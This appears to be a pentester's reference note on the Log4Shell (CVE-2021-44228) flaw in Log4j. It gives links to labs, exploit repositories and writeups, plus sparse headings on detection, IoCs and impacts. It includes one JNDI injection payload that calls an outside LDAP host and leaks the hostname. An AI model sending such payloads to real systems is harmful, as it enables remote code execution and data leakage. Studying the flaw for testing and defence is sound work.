Log4J
Log4j
https://pentesterlab.com/exercises/log4j_rce/course https://github.com/christophetd/log4shell-vulnerable-app http://www.dnslog.cn/ https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j https://www.lunasec.io/docs/blog/log4j-zero-day/
And a programmer might not even know that this vulnerability exists in their code because they might be using some other library that depends on the log4j library.
${jndi:ldap://${hostName}.io}
Summary/Writeups:
LunaSec Writeup (this submission)
Cloudflare Writeup (CF WAF customers are protected)
Fastly Writeup (Fastly WAF customers must enable a rule)
Validation & Detection:
YARA and grep rules for blue teams (see comments for nuances)
Indicators of Compromise:
Atomic IoCs seen performing mass exploitation (mostly tor exit nodes)
Proof of Concept:
Reported Impacts:
Palo Alto Panorama (unconfirmed)
QRadar SIEM (unconfirmed)
Some of the above sourced from this impact repo.
Misc:
Possibility that v1.X series is affected (unconfirmed)?
Possibility that
iiop://and related CORBA protocols are vulnerable (unconfirmed)?
Last updated